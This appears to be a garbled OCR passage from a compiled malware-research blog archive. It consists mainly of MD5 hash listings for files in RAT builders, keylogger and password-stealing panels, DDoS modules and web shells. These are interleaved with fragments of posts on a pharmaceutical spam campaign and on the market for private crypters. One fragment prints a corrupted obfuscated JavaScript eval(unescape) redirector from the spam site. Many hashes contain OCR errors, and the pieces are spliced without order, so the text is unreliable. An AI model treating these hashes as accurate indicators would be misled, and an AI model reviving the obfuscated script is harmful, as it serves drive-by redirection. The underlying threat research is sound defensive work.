06f472f35fc233db58b79e0f380a43b6 
35.gif 
146b3e4d762014efe3fa3218fd94b7a4 
36.gif 
d05bc60641c9da516442366999c4c4fe 
37.gif 
f8dfcd77f222739304421632c7e48f78 
38.gif 
a04b34cd685e33beb759d15dab0fe4c8 
39.gif 
8eec5350a96bdb8070d06fbecO01cb59f 
4.gif 
b6da3782b873b59de602faa40251a9a8 
40.gif 
6e1b32f961c99940e1393748084b1e9e 
41.gif 
O2ceff386ffeb997981f2b26b6bc6667 
42.gif 
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4. http: //www.ft.com/indepth/onlinegambling 
5. http://www. goldengatecasino.net/ 


3.10 October 


3.10.1 Love is a Psychedelic Too (2007-10-01 12:49) 
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Compared to a previous example of an [l]over-performing image spammer whose efforts to 
bypass spam filters make it virtually impossible for someone to fall victim into the [2]pharma- 
ceutical scam, in this example of image spam we have something very interesting, namely a 
dynamic subdomain generating spamming host running a proxy server every time the central 
Campaign URL gets refreshed via an obfuscated javascript. meds247.org (216.55.70.170) is 
the public face of abetterlevel.org (221.130.192.17), and here are examples of the "one-time- 
scams-in-everything" style subdomains : 


cpv9c5pt.abetterlevel.org:8080/cg/viagra.php 
ccj70tjcm.abetterlevel.org:8088/cg/viagra.php 
fdbtpju.abetterlevel.org:8080/cg/viagra.php 
b80cpno.abetterlevel.org:8088/cg/viagra.php 


ffh3rj8zn.abetterlevel.org:8088/cg/viagra.php 
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e5a1ab6a90e92375d9a11b76c95a673e 


43.gif 
dff14a65906803b3fa2e1ldd6bdb126bc 
44.gif 
9803e1dc34fd09073f550d5256949c14 
45.gif 
42321616a1c294f054c013bb77e50101 
46.gif 
d4539f3662b019383934c12e344497ec 
47.gif 
5b3eb2329de1f928a8351508fb7a4d05 
48. gif 
€07a06dd235248146d7224d76a478be7 
49. gif 
df9261072a3e794e29f33c0c45354c3c 
5.gif 
37f6b5743ed63daaf8c051546f89ad9c 
50.gif 
d0ba03004396b5e6bc59a4c5bdd396c9 
51L.gif 
856f3ad0b428d6c1940fbdb3de373440 
52.gif 
72d6b92b39083ae91a043daab7807b73 
53.gif 
acb0ed13205613ad6d0aac4d5ed5c91b 
54.gif 
e€4100184abe6fca2b69ed1e43d7d7658 
55.gif 
ab663b86aef621f65a97088bda51a5bb 
56.gif 
65557d895955c9cfa7c578364331e166 
57.gif 
9a0e587b8b721853267300e911858c72 
58.gif 


8d014a00da38d2ffa113257c9fa682fd 
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59.gif 
2bcfOcfed17d8271214b675edaa6fa44 
6.gif 
9dcf473d88e2effd1c41bba49a139bd4 
60. gif 
aee8cfd7d7636e7df7aa4eacdb251951 
61.gif 
542fbode9d381ac2c75e2fd57955d823d 
62.gif 
9b1b991e34ac2a9316d01b7e66e131ab 
63.gif 
4efbe504fff872148182fde3a9a276e0 
64. gif 
7502cdf18691cc48a167dcd8e8b9cefe 
65.gif 
0945fd0161acf9987a9541bb0cd484d9 
66.gif 
€397193fc1725b87947352dcf84b24b0 
67.gif 
4e9e23ac31f72332d09b903174a38c48 
68.gif 

52a1a01b39f6f14ff5 7a145e2c82b66f 
69.gif 
eaaf1477e718f95a8e2a993fc695a661 
7.gif 
343f151922abe4d904981e8577bc0243 
70.gif 
50afefd6f4ea8821dfd1f3816977f32d 
71L.gif 
29947a47e0del1c1a115638fc2c7687d1 
72.gif 
39¢34e6872f51231086bd54f14c64884 
73.gif 
52a80bc55141c14f6ee0fe691d6d4f10 
74.gif 
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52a80bc55141c14f6ee0fe691d6d4f10 


75.gif 
24d20928cb0f345659739ea349d0d20b 
76.gif 
clbcc44017085443c6376c6d47da66d9 
77.Qif 
3¢€7451994352c2e8083e000edc0e0b7a 
78.gif 
f47afbff19e1b1e45b3c2d363822bbe5 
79. gif 
65ed9d2187c4fd8ca467b76c6047885c 
8.gif 
73d7ba67641e4d634eb477079801d5b5 
80.gif 
f58fa2d59ae057eeda7acOb3aedc3027 
81.gif 
20533204cae6bbcde4e2bd7327f0877a 
82.gif 

Odfb29b6f64aa0e7 7db62eb495d86b29 
83.gif 
4502f26ec51764f07ff00da3e3eae0a8 
84.gif 
51ad4f4d5e1d8a193c3e9a8c541101bf 
85.gif 
b32fab25880788729056fcdf5fe4a99d 
86.gif 
5b633d5dd3416e00997f221879ecab538 
87.gif 
f2aee064bcOb1e29eec6c58b80101cfd 
88.gif 
b458c5eacd65789bbfd728506d1bf8el 
89.gif 
2d359ce812d664433a6c6b3343ef438a 
9.gif 


4914e360e499cc6f3fa70dd707eb23b6 
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90.gif 
6291e3e39f4402ba3fb074baeaa224f3 


91.gif 
b5b26b771a542762fc93b8ffb3f29ba3 
92.gif 
60825907a63ee68101200974bde4b21e 
93.gif 
142f1a438411c868560f8ada159702eb 
94. gif 
6a8dfldfa0ba72eee0f6cd7d45a45ba8 
95.gif 
0aa86b6385b5902ad03c3292604e3dbb 
96.gif 
6e35d1ef0253ba10814e8321db6bf683 
97.gif 
a2eeee677e6e4840fbc583acf0426e83 
98. gif 
9e4a1c0783e22d2d3654639a5f259227 
99.gif 
3e7b659881a3796ce33703bc5a0362651 
basic.png 


55a687e848244b76f8d8249b111df860 
connections.png 
ab0667280425cdc664722967d7d91d21 
group.png 
3afbbb77c13a366898f9088f7ae086a0 

misc.png b812fdldc52bb98af4982b67049e85bc 
star.png c8ca219ff43a2fb1dea67de2582123af 
user.png a8b95cb88438374e20d7ff905dbd9f94 
user _gray.png 
cac109a5658accb74c8216f247949c85 

dos _sock.bss 
65870fa25267e3402be06f17b2a39cf0 

nir cmd.bss 
flc88bcbddfbab2840b1e4184561c488 
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pws _cdk.bss 
85c1le270f7eb2912781b49d8693f6ae9 
pws _mail.bss 
969fd1e0449fala4b5b94e0a37cacded 
pws _mess.bss 
c81df210b673ea4fc4443531c242da0f 
default.bss 
1cc093771a97ded6aacd4b3dd43a46d5 
bss-black.skn 
5db1363clae3fd406d206e53a7e02944 
bss-brown.skn 
f52f65610fdb82f98a8810571c24e7a9 
bss-chrome.skn 
685f4faba93cabe195a9309ddf8ff084 
bss-flashy-black.skn 
0c858cb39e08a929d85aa0ab4a6e1834 
bss-grey.skn 
14d98dc49e9906e0fd2802d02104fab9 
bss-light-gray.skn 
4eb0b41d98804575ab9cda351ee045a7 
bss-lines.skn 
7b6ffe26cc03209cecalaa87a0b98a5d 
bss-luna-royale.skn 
b66c68215c5b064a8fd50c956cc7fbea 
bss-mac-osx.skn 
0e965573c27a6df869739aa2c2217d89 
bss-mint.skn 
f3ae52aaec4a4b8d2caal4caaca7/522f 
bss-office2k7.skn 
6c81f596bfda0b754e3514a46ee48119 
bss-relax.skn 
3a18bcf3869189a692c379d58685056a 
bss-simple-black.skn 
73918a13a6d63c8a3913c99083243249 


bss-skin.skn 
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d944d09956b76d1e4860eb04446bb1led 
bss-smooth-simplebuttons.skn 
e57ad30898e736bb96710074d86fabic 
bss-smooth.skn 
2884ed2ea4807d4bddd25415e49c5cce 
bss-thin.skn 
63b155c8df94f3aeab4241958bcab6c4d 
bss-xpryoal.skn 
6cO0bd266c38cb1020ee0c39e4b9b4123 
countries.bss 
d45d0b61f17f6663a12fc87fff47525b 
ddos.bss 77ee28857b573ad2a4b5142e9e8c453d 
ddosfail.bss 
8602159c61dce47dd9d295eb5bdf0694 
ddosstats.bss 
716b6334077cd9882e80aba54fde43d0 
dload.bss 
729111d29943829f626b9c301c7f710c 
dloadfail.bss 
776cac7bf39a9fef7c37ab6f3ee77fd55 
full.oss d6a6574e931461laf20a57alf3acd2714 
login.bss 
f9eae3151604dd5356e832dc70d78cb3 
loginfail.bss 
cdfbdd08a9331b1ac4611df651d11lab1 
main.bss bO3blaf768e11e2d8756f89ccb5ecb63 
os.bss 

cf5e2d02b5b165011940ee2 7cOabebc4 
pws.bss 
13a4138aaa82a20d88114387a7cf8d2e 
settings.bss 
d207a643ff3d2e7bbd4258419c1ddda2 
unauth.bss 
f398742b315f6d36393d322701e86c0b 
users.txt 
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d211e76716e66818bc4d74c084626af8 
README.txt 
9185ce8327988c6e1d02249e53d9f143 
cddel.php 
19cf9eb705a3c755d5bal4e166c6112f 
cdkey.php 
6942cfab6edb79cc2be04a907c28f6eal 
conn.php 37ad5f60b9f54dc9b74baal5815acf0a 
conndel.php 
a70baf5e5f06f0601530e5b88451bb13 
index.php 
f5c3f16ab56913616e6a531ede533939 
keylog.php 
aeba8c729a2cdbeb6f4e46afdb491lac2 
pws.php 
4e9ca5b82e62f9a6996e00ecalefc7fc 
pwsdel.php 
5ba5136760328f58cc98ee95c4f17706 
rev.php 
8baa6c98035ebca3010b4e075f379714 
.DS Store 
9cd84cee4105030d9eael1c76a434eb84 
bssnet.php 
be5d3add9a98579deb8ab79602791128 
dwsync.xml 
95a3918c920420c59dfdeOb1acd54917 
demo _page.css 
0490ab7ba4d114cb224e619cO0d3adbba 
demo __table.css 
Ode9bd61d186be9386891b532236658f 
menu _style.css 
Off6b2e93edc1327854f59e1c6d8f494 
oneColLiqCtrHdr.css 
8a5c019ce3b77d1271bd94650f7eeleb 


style.css 
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42b0d00a5a1242ecb3c2d5c04b8b8041 
dwsync.xml 
42858c25ef3f7d0808fd6e7ead53c399 
b-content3.jpg 
8e7f40aal10dbb5020c9e87c393cbd7c3 
bottom3.jpg 
1e9a2c3a5e9688cd05497aeec9938327 
bottom _bar2.jpg 
a77278fle7e6bfdfdae9e8930ece9304 
button2.png 
7€349c221317f01b430852165de4370c 
button3.png 
Ofb84be31d8ad728f2845c46aa7ae3d0 
content2.png 
9d163df433f71d91f5b0fc72c5f3c5ab 
copy document.psd 
e56d61ced0696c99bf9F4ffF737f21c9 
copy.png 4693e94dbf5ba4e0a28ad4b0535f5828 
copy _hover.png 
d681f5b29baaa368e7f309f9d08fa5e2 
csv.png 
04bf5d1e88e09bb87b8d51a7411e5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
current-bg.gif 
a25a5ada157f5257f3711433e9d60dce 
details _close.png 
c898cf9eel4ach6c43909bbe29fb0b36 
details open.png 
10536bd1b325a99b5e8808de9fd597ce 
file _types.psd 
72310ab8674f6216e9a5f66ee5e58e3b 
menu-bg.gif 
fc8fe2e9f91fe48e8c4d9fbbbef9baaa 
menu6.jpg 
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345d6c66d3648852c327c45c7db71585 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
printer.psd 
c38ee5906af9ae70e499fb3e0af86cd7 
print hover.png 
4dded8247005cc26a611a713fdd31335 
top.png 
5c459dbdf52d16de53862af1cb365990 
x.gif 
9eca372807e455a437a5f90d171a1c47 
X.JPg 
0d19afc9603f799d355447d073a874f1 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls _hover.png 
cc50cef418d070dc204157ea11f44ee8s 
dwsync.xml 
5065fb2a6b6eb7c21c684aed3f1lb6c3f 
ZeroClipboard.as 
66d654280f11f11ff3e7 9afa002d9f78 
ZeroClipboardPdf.as 
49d7f08efd7e1a70d0ed324517c6eb77 
AlivePDF.swc 
eefb8ea538f0fc8d54e5613b4e81c83f 
TableTools.css 
79c445a96cd14e0338654d938f586bd8 
TableTools JUl.css 
b8c4a3eee3ff60bde898396657a75355 
dwsync.xml 
7f37c1aa3291befe116128b3b5c5157f 
background.png 
0953547609fedb241a4f6e86d47cc57c 
collection.png 
b8b601fbe718b934ec74e2e910c28afa 
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collection hover.png 
aa2e592ba6fa4024a2e5adb63e4d2fof 
copy.png 49816clabbb0646aa7fadaea57cc2d3e 
copy _hover.png 
Ofc278d1lef776f8cledbc7ab272fd850 
csv.png 
04bf5d1e88e09bb87b8d51a7411e5dab 
csv _hover.png 
04a1cb8a2794a605461f8211fe46738c 
pdf.png 
b2c9c2e53dbe4590899b644e74e21cec 
pdf hover.png 
fee93c289a49bd1a98399b9bdadf4627 
print.png 
b12a9855f2b25f5a770753ddf9546b4d 
print hover.png 
4dded8247005cc26a611a713fdd31335 
xls.png 
e7db69e4cae5a975d12a9922bd62855c 
xls hover.png 
cc50cef418d070dc204157eal11f44ee8 
dwsync.xml 
cbde55536eeb08d7295ebf7 63cff344c 
TableTools.js 
d8a7fc6ca87eca93ael 7 9df5ff74484b 
TableTools.min.js 
0f360b2767130536201ea007394b98ce 
TableTools.min.js.gz 
4a7a0c33b18d7d5e5488408550da32b8 
ZeroClipboard.js 
64b4a4d23618f65ed114a66f931bb76f 
dwsync.xml 
623a8de9c60a61aca9f9919dc3517689 
copy _cvs_xls.swf 
4fcaded96ee2274bc3c6b4d76b56a762 
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SCRIPT LANGUAGE=""JavaScript"> 


val(unescape("\X76\X61\X72\X25\ X32\K3 OVX 72\ KOS\X25\XS2VXSO\K25\KI3\ KSHV X25) XB2VXSB\XGEV KOS A\K77\ x 
PS\XS2\x3 O\xS2\K65\x67\K4S5\xX7B8\ x7 OVX25\K32\X3B\X25\K32\K92\ X6B\ XZ AVX 7H K7 OV X25\KX33\ X41 \X2F\K2F\x2 
B\KS2\X3B\K25\ X35 \xX4S2\x2D\xSF\xX25\x35\ x43\ x2ZE\ x3 O\x2D\x39\x61\xX2D\ x 7A\ X41 \X2D\ XSA\K25\ X95 \ xX4S4\ x2B 

R25\KS2\KS9O\KZF\K2Z5\KSS\KNG\K25V\KS2Z\KS2\K25\KS2VKNS\K25\KS2\KS2\ KOOL KO7\K25\KS2\KS2\K25\KS2\K39 
K25\XS3\KN2\K25\ XS OV KAY K25\ XS OV XNTVXZO\KOTVKZ2\K25\KXS2\XSG\ KG TV K7Z2V\K7Z2\KX25\XS2\KSB\K25\XS3\ KNX 
PS\XS2\X3 O\X72\KX65\X2E\K65\x78\X65\ x63\X25\xX32\xX3B\ X60 \XGF\ X63\K61\ xX 745\ x69\ XGF \XGE\X2E\xX68\x72\x 

\KXG6\X25\K392\ X99 \K25\ X33 \KS2\K25 \ XS BV XH X25 \ XS OV KAA K76\KG1NVK72\K25\ X32\ KS B\ KGS X25 \ XI3\ KH x52 

KOS\KO7\KNS\K7B\K7 OY KZE\K25\KS2\ KIEV KST\K25\KSS\KN2\K25\ KS OV KHAN K25\ KS OV KETV K7O\KO1\K72\K25\ x32 

SO\KR73NK73\K25\KS2\ KSB OVX25V\KSS\ KEN K25\XS2\KS BV KONA KZE\X73\K7 BV XOC\KOO\X7 EV K25\XS2\KIB\K25\K32\K 

2\KZE\K25\XS2\KS2\K25\KB2\KS9\K25\XS3\KS2\K25\ KS OV KNE\X25\ XS OV KETV X7O\KOTVX72\K25\X32\ x3 B\ X60 \x2 

\KXS32\xXS3 O\X25\xX33\K4S4\x25\x32\ x3 B\K73\xX739\KX2ZE\X6C\xX65\ xXGE\K67\X74\x6B\ x25 \x33\ x42\x25\ xIB\xSs\ x25 

XS O\KAAVK7O\KGTVX72\K25\KS2\ KS B\KG2\KOS\K25\KS2\ KI OV X25 \XSIS\ KAM K25\KI2\KSOVK73\K73\K25\ KIS \K4N2 

BO\X2D\KXS2\K25\KS5\ KEE K25V\KS2VLKSB\KZB\K25\KS2\KSB\K25\KXS2\KS2V\KZE\K25\KXS2\KS2\K25\K32\XSB\K2B\x 
PS\XS2\K3O\X73\K73\K25\K35\K42\KGC\X2D\K3S1IVK25\X35\ KEE K25\XS3\K4E2\ X25 KS BV XNA K25\XSBVKATVXO9\X 
B\X25\X32\X3B\x62\xG4\ xXZE\x73\ x65 \K61\xX72\x63\ XG6B\K25\ X32\KIB\ X25 \ X32) K32\K6B\ X67 \xG6B\ x25 \x32\x3] 

X25\KS2\XI9\K25\XISB\KAH\ K25\KISB\ KEE K2D\ X31 K25\ XS2\KS9\K25\KS7\KH2\K25\ XS BL KEE\ X25) XS B\ KNIT K25 
KSO\XS9\KON\KGE\KOS\K75\KOD\ KOS \KGE\KZ4\XZE\K7ZE\KOO\K7U\KOC\ KOS\K25\KS2\KXSB\K25\KS3\ KEM X25\K32\ 

O\X25\XS2\K32\K57\XO5\K6C\XOS\KGF\XOD\KG5S\X25\XS2V\KSB2\K25\XS3\ KHZ) X25 KS BV KES K25\XSB\K4TVX25\ KF 
V \XS4\ x65 \K6C\X73\K65\X25\K37\ X42\x25\ XS BV KSSH) X25 \ XS BV X41 \X25\ XI B\KS9\ XOS\XGF\X63\K75\ x6D\ X65 \ x6E 

X7A\XZE\XTA\KO9\X7E\KGC\ KGS \K25\ X32\ XS B\X25\XI3\ KHA\ X25) KI2\KIB\K25\KI2\KI2\K57\ x65\ X60 \ xX63\ x6F 

6BD\KGS\K2Z5\KS2\KS2\K25\KSS\KE2ZVK25\ KS OV KEE K25\ KS OV KEAN X25 \KS7\ KEE K25\ XS OV KNA\K25\ KS O\KNT\K75\x 

2\KOC\X25\XS3\ KSA K25\KXS2\KS2\KOB\ KZ EV KZA KZ OV X25\KSS3\KETVK2F\K2ZF\K7Z7\K77\K77\X2E\ XO 1\K62\x65\x 

\X74\XOS\K72\K6C\KO5\X76\X65\ X6C\KZE\XGF\X72\X67\X25\ X33\K41\ X38 \X3 BV XIB\KIB\ X2F\KOS\XG7\K2F\ x25 

XB2\K32\K25\KIS\KH2\K25\ XS BV KSH\ X25 \ XS BV KN1YK76\ K61\%72\K25\ K32\K3 OVX 76\KXGS\KS1\K25\KS3\ KSEE X25 

S2\KS7\K61\K62\K63\ KGS X65 \ KG6\K25\ KI2\KS7\K25\KS3\KN2\K25\ KS OV KEN K25\ XS O\KN1\K76\K61\K72\x25\x 
B2\XSO\K7O\KOS\KS2\K25\KSS\ KUNE K25\KS2\KS7\XSO\KSIVKS2\KSS\ KIEV KSS\XS6\KS7\XSB\KSO\KXSB\K61\K62\ x6 

\XG4\X65\K66\X67\K68\ K69\X6A\XOB\XOC\XOD\XGE\ XGF\X7 OV X71\K72\X73\K 7A X75 \K7O\K77\K7B\K7Z9O\KZA\K2G 

XB2\K37\KX25\KI3\KS2\ X25) X3 BV XS4S\ X25 \ XS BV K41\K76\ K61\X72\ X25 \ X32\K3 BL XG3\ X25 \ X33 \ XS4\X4ED\ xX61\xK74 

6B\XZE\ x66 \xXGC\ XSF \XGE\X72\KX25\x32\K38\ K4SD\K61\K74\ x68) XZE\X72\ X61\ KGE\ XOS\KGF\KOD\X25\x32\x38\x 

S\KS2\KS9\K25\KS2\KSB\KZA\K25\KS2\KSB\KSIO\K25\KS2\KI9\K25\KS2\ KS OV K2ZB\K25\KS2\KSO\ KINA K25\ KIS \ xs 
P\X25\ XS O\K4S\X25\X3B\KEINKZON KO INK 72\K25\K32\ XS BV KO4VX7 B\X25\XS2VKSO\X2Z5\KS3\ KEEN K25\XS2VKSB\K7 


Once accessed, a few minutes later the subdomains either stop responding, or start listening 
on the second port. Moreover, all the subdomains generated at abetterlevel.org resolve to ra- 
dius.tercernivel.com (200.57.39.20) an indication of an ecosystem operating on three different 
networks. 


1. http: //ddanchev. blogspot .com/2006/06/over-performing- spammer . html 
2. http: //www.uow.edu.au/arts/sts/bmartin/dissent/documents/health/pharmfraud. html 
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The demand for private [1]malware tools such as crypters, loaders and droppers is in tact with 
the supply of such tools, a market model whose higher profit margins satisfy both the coder 
of the tool as the seller and the buyer who’s willing to pay a higher price for an undetected 
malware tool compared to using the publicly available and therefore with a high detection rate 
ones. The seller’s one-to-many market proposition may generate sales on a volume basis, but 
the more people have the malware tool in question, the more commoditized, thus ineffective 
and much easier to fall into the hands of an anti virus vendor or a researcher it gets. And so, 
proprietary malware tools started emerging, ones only a small amount of people have access 
to. Nowadays, the malware industry is slowly maturing to a services-oriented economy as the 
logical evolution from a products-centered one, further accelerating its dynamics and future 
growth. What follows once goods and services both mature as a concept? Outsourcing, which 
as a matter of fact is already happening. 


The Invisible Hand of the Malware Coder 


POLYMORPHIC = X 


cryptor manager: 
coder: 


Ky¥NMTb KPHNTOP MOXHO TONbKO no ICQ 


EXE ana kpunra: 


.OBaTb NP nomowH PECompact2 
Mi Snakosare np nomown UPack 
MM Snakosar’ npu nomown XCom 
BM Seenuure pasmep go ———— bait 
BB S6pare vkonKy us EXE (ymenbwutb pasmep] 
BB Cmenire vkoHKy Ha ceo 
MB Aerosanyck us Peectpa 
Bi Camoyganenve 


The concept of proprietary malware tools is a very interesting one mainly because the coders of 
the malware tools are exercising control over the supply and distribution of the malicious goods 
in order to earn a higher return on investment, and ensure the customer gets the best product 
ever, one that must remain undetected for as long as possible. In respect to the distribution, 
it’s sort of a self-regulation issue mainly because the buyer that spent a significant amount of 
money to obtain the latest malware tool will not leak it online and turn it into a commodity. As 
for the seller, he’s ensuring that the tool will be sold to, for instance, five different people, no 
more and no less, since the perceived value and coder-added exclusiveness will result in a very 
high profit margin. 
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18b1d7b6cdd339c54a932195a48c5d96 
Office 2007.skn 
ba4029be7069329be089b7d789eab64ad 
office2003.skn 
07dclba635eee0edf8e721d22d08abc0 
ONatural-BLUE.skn 
ad28ad7ce71a2b380702adec9947a99F 
OpusOS-BLUEB2.skn 
73c5ee5eb79cb869c87ddf6a757d39d1 
OpusOS-DEEP2.skn 
7aaceea37b23b488130a0bcbb6c461f5 
OpusOS-OLIVE.skn 
a3adbe28186864478a01b5311b2e76a3 
Plex Style-PLEX.skn 
6a32c7eb12129eaa04205cfce2153200 
Plex Style-PLEXM6SVR.skn 
c57532550440d653b7d9a7aed67abaa9 
RoueGrey-SLIM.skn 
2de74dc3f87cb3d269c542312d9f0165 
RoueOlive-SLIM.skn 
a90981a2f900d65e8b3a7f7845a4ec6d 
RoueSteel-SLIM.skn 
a83f345b22f93e4375717fc5c4c159df 
Royale Glass-GRAPHITE.skn 
48ed4034e5353ec86ab20df53e9909c2 
Royale Glass-INDIGO.skn 
d39afd458a82d52889569cea78009188 
Royale1-BLUE.skn 
b453c3eda9eb762742e0a86f67e8d8d0 
Royalel-HOMESTEAD.skn 
1f215201a27f22180eb614a254773105 
Royale1-METALLIC.skn 
lacc9b187b6ccfb16d5da02ffd3f65ab 
Samui-SAMUI.skn 
6f35be300f4c6fca962e87445ed6ef47 
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Samui-SAMUI22.skn 
98d2adf7dc8b8b79e2793b964834cc2d 
solaris99.skn 
19b941df687a06927a07f3f319add5ea 
Sustenance-BLUE.skn 
aca70ca4ba758d3a2f642ea208767cb1 
Sustenance-ERGO.skn 
b64002146b0d23c18e0e08e83cbf9be2 
Sustenance-METALLIC.skn 
b558466d934c9bd156055fcd69669392 
Sustenance-OLIVE.skn 
19b3d733dd444aa58fb0b339d86c09dd 
Sustenance-SLATE.skn 
22768b1c5ae9dae51de8e48f3e40874a 
System4-BLACK2.skn 
O3beeb19ccal6edae5ce406f93c7679e 
System4-BLUE.skn 
e0d87e0ae5c56ba46233258ba0a282d0 
TangoXP-BLUE.skn 
9d2ec6f14663b31090d5429f27a31945 
TangoXP-OLIVE.skn 
bb205f4ac4625f2983c6481ecd8bd777 
TD 4-PANTHER.skn 
17b09a53d88338fed602a0b5caladc89 
Tiger-WINDOWB.skn 
1fc372549cd168973dee52d97593a433 
Tiger-WINDOWG.skn 
ace285f6206f26c1f634b83fldf7bdOf 
Tiger2-TGR.skn 
#7252903b0a4a75273274fb927d27f05 
Tiger2-TGRPS.skn 
€3a797905b33194024adbb7bd05c3f35 
VistaXP-VISTAXPB2.skn 
204d2da2cc459ce905cbd6b881leela8b 
VistaXP-VISTAXPS2.skn 
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86bedd6c8b05b6d43ca761ledalc86dle 
Watercolor-BLUE.skn 
0f1888d8cc51d125a3370e40ad84b1dc 
wmpx-XMP2.skn 
92d6cdaa2a55b724eafe815dbdac07b1 
wmpx-XMPX3.skn 
0960ab16329c0f2e1207ab3f7925b03b 
Xplorer.skn 
c09540e44c9750cd28374a8bb2d6fcb2 
Spoofer.exe 
894b256f41dc579a5b32828ed2f7e3db 
Client.jar 
9a10a87c2d7f10b9f2fcalae3e489729 
Decrypter.jar 
0d2a82af0dd949d9929541db221c8eac 
Downloader.jar 
ab1f3f9516daf115e79ff7e733e31fle 
id.dat 
5a61d172722d8920444274d0249847c7 
ip-to-country.bin 
f0683f18498c7173b2caf97d8abf7271 
keylogwords.dat 
d94051db69fbc89bd0339063d0d18071 
run.bat 
9394b382c62d13aelcb0e65c764ee361 
Server.jar 
e71b8c3e75d3bb7fle5ae411b28606ad 
settings.dat 
c1d8832eeb99389971137169al8debee 
sockets.dat 
ce5c50cb8d32635b14913ccf5fa09312 
stats.dat 
5a61d172722d8920444274d0249847c7 
LokiRAT _Relapse.exe 
aabb54951546132e70a8e9f02bf8b5ba 
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PHP Files.rar 
cad2a316f33d047461d42c412c3af199 
SkinSoft.OSSkin.dll 
68aa06896e0a84224bb9f8f587642d19 
admin.php 
16c33e28c8c9b3ea71249ad94be4bf94 
bot.php 
16b8e0abb69f46eb91781bc9f694c34e 
connected.php 
772313555a5d10db626dd34ae7b02731 
database.sql 
9fleb81a61d7651d3e0e6f3247ac9da7 
settings.php 
2afa49df5a4ea261c1ce306945be10c8 
Database.txt 

Paradox RAT 4.2.3 Cracked.exe 
4674151265ee5f4c33ab71fca3662031 
Settings. ini 
14cledb82403a82167ed484b3bf54d54 
Updater.exe 
cd797a71127ff159337db80735f7bf9a 
cam.dll 
cdbadc56ff4f49db676b3eff525c1112 
ch.dll 
d74cdebOf39dfdebef0055cf8c67c2e5 
fm.dll 
d79ab7d962f7a4415ab5cdabd7b713de 
proc.dll 96a93b99c77cb368a71elae95ed64072 
pw.dll 
008e4e04dd4af5b9f030ff5a083be411 
sc.dll 
dd9de81a6b3ce967892d4351045362ab 
Poison Ivy. ini 
710d7be3cc5b35638b5dd64b0cc4765a 
readme.txt 
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4a51c931f1f84d148da34240392eb297 
Change Log.txt 
57ef5e77872cdce803bce35f0d878b87 
preview.png 
92901cc71fb25af455faa493d616faf9 
READ ME.txt 
e8277a2bad0882ad482c3c30e9dd30cd 


Tiny.exe b9f7f125066c414f71fb9b805879a4cf 


Cliente.exe 
c95ad713c0cf5c30a5ba805b9e3a7434 
sound.wav 
ff8b7adc4209146b4ec595a986fd6384 
default.ini 
4f04a2713b7b7e2e8d2467a0813c5489 
Profile. ini 
247be0a58c3104fc179d6e4f1lef87950 
settings. ini 
a505ec1817ae944e8e5aed7f159e0adb 
XtremeRAT 3.5 Private.exe 
5284a30cd7e0ff8ac7600bd8914cd6le 
English. ini 
69b0e65fa5090f33f323932a090e64b9 
Espanol. ini 
9c5a0c888a102a14189e284eb483142a 
Portugués. ini 
f37aa0e63d7c69071e1lc865b8dcddef5 
BHH Shell Checker.exe 
df6e5c302c55325fa2a4b2f2db753579 
ShellChecker.exe 
f908b5fe0ac7d3cb76a9054112093860 
cmd.php 
0a4d17d0b3e6551cde71a09cc2070490 
CWShellDumper.php 
0a4d17d0b3e6551cde71a09cc2070490 
login.php 
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0a4d17d0b3e6551cde71a09cc2070490 
r57.php 
ced8ec864e3332ec16781807d60eb7a0 
saudi _sh3ll_v1.0.txt 
a9092366da69de666f54b7bc62b1d441 
Shells 3.rtf 
d19bc20cd6b6c25bdf56339e316033cf 
Shells 4.txt 
23fa4ef706d183b4fee7b5d66fd49406 
shells.txt 
€3622a05746802e03bd4f3f56b4bbcee 
shells1.txt 
16a04c285878b6d72d95956f4b944a06 
shells2.txt 
afb84fbfca2c58665ee0b1a2b599529f 
easy-diagnostics.exe 
5ba385bb08d996ad4d7e5c8d29767672 
easy-hide-ip.exe 
3372df400379f153ea04b3d9aab2093d 
msvcp100.dll 
d7f0743aa7f1c576a71076568b471180 
msvcr100.dll 
0e3b4a3caa4b97ea2f6486e2a732141e 
uninsO0O0O.dat 
1c6290940232d2d075b01fa87d1f2053 
unins000.exe 
be2b617b7b45bf2437e05c638a95be62 
EasyLSP.exe 
30d74e781d750bdce10e00a445a0afed 
EasyLSP64.exe 
beb615cf4f21bc38f3f2667b14dfc524 
EasyRedirect.dll 
d8be4573b207a91a32694ed16d48975f 
EasyRedirect.exe 
04dfb5f75368d32e05e3d8d4b9e5198a 
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EasyRedirect64.dll 
6627d262277f70043cb8aa6bc2fcb62d 
EasyTechCertInstaller.dll 
6adc9c9504a5792dc877e66a45f13d31 
freebl3.dll 
3b47b842e8a17c994a6b252d7a794f57 
libnspr4.dll 
431dc7477af22a00df62de20233ebaaa 
libplc4.dil 
7abc08559d72a067edd6636948c7e5db 
libplds4.dll 
61c742f32fd1b1d3b47b5fad2d712c84 
nss3.dll 6a5120ff0556b4f278a602bf06a2c954 
nssckbi.dll 
f368b9dd3c6flf2da8ce84dd47a34d19 
nssdbm3.dll 
d17c6fb99411950c838155934b25c6a9 
nssutil3.dll 
5e70600f53da5afacc7c59d9f845d6f4 
registerlsp.in 
b0e46dcc286e3c7ff04f39314ba0e992 
smime3.dll 
755f6e1287b9cfalf88099bceO0bcc4cc 
softokn3.dll 
4014aed993ba738fcab08827c5b5al7f 
SpOrder.dll 
a082e5473b2a9a4d846ed7ddf637ac76 
sqlite3.dll 
94b0049b76b517e0acccd03abcaa7b08 
ssl3.dll cee7b24d1526fe99d34a01b33157f2ad 
Hotspot Shield Launch.Ink 
a61a17cc10c76eb1cc997f749b2c4e6e 
hss.ico 
915c9d915054844a1c83764702b3eadc 


license.txt 
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dc4529d16b72d53ae0c465b53f083025 
Uninstall.exe 
7318838aa2edd414613b6fda6a529d65 
af _proxy.dll 
f9be5a7328e6c3ce471434ac4f244eb1 
af proxy cmd.exe 
d128f0f856c3784c4a642d685f9e2521 
curl-ca-bundle.crt 
9577911a287da19e18414d8a2285493d 
fow.exe 
753a5929fc4ba1d25394cbec264b1189 
ffinst.exe 
5bca9b3d8ddb2428bac2401a12442f99 
hssfixme.exe 
15a9f6e29a3b84f1406cd3a3ee7b8669 
hssinst.dll 
3f22ccf8b64e9daf539b9e101e35243f 
hssinst32.dll 
a11704e9ffdf72ed8cb63154e550d634 
HssInstaller.exe 
b4c7c077a60e0bc9a8a983081f553a44 
HssTrayService.exe 
5527cf1ff457e819112eac7dc0aab69cb 
hsswd.exe 
f4c1b3c4847bba03lacfdce5a3f0cfcb 
libcurl.dll 
